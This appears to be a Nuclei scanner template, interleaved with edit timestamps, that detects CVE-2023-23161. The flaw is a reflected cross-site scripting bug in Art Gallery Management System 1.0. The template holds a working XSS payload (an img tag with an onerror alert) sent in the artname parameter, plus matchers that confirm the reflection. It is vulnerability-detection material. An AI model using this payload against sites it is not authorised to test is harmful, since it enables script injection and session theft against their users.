2023-07-22 06:07:25 +00:00
id : CVE-2023-23161
info :
2023-07-26 05:55:48 +00:00
name : Art Gallery Management System Project v1.0 - Cross-Site Scripting
2023-07-22 06:07:25 +00:00
author : ctflearner
severity : medium
2023-07-26 05:55:48 +00:00
description : |
A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:43:37 +00:00
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
2023-07-22 06:07:25 +00:00
reference :
- https://www.exploit-db.com/exploits/51214
- https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
- https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-23161
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
2023-07-22 06:07:25 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2023-23161
cwe-id : CWE-79
2023-11-01 14:45:21 +00:00
epss-score : 0.00091
2023-12-12 11:07:52 +00:00
epss-percentile : 0.38478
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:*
2023-07-22 06:07:25 +00:00
metadata :
2023-07-26 05:55:48 +00:00
verified : true
2023-09-06 11:43:37 +00:00
max-request : 1
2023-07-22 08:02:10 +00:00
vendor : art_gallery_management_system_project
product : art_gallery_management_system
2023-09-06 11:43:37 +00:00
fofa-query : title="Art Gallery Management System"
2023-12-05 09:50:33 +00:00
tags : packetstorm,cve,cve2023,art,gallery,xss,art_gallery_management_system_project
2023-07-22 06:07:25 +00:00
http :
- method : GET
path :
2023-07-26 05:55:48 +00:00
- '{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'
2023-07-22 06:07:25 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-07-26 05:55:48 +00:00
- 'center"><img src=1 onerror=alert(document.domain)>'
- 'Art Type'
condition : and
2023-07-22 06:07:25 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 490a0046304402201ba519b83c6cc7b0cfc747995fe1fd5f43a790e7343908a60e658011a15c1d47022007bf702fa8235e432d185f8b223570caa526cdaac6c9b74eb53862955c19aca1:922c64590222798bb761d5b6d8e72950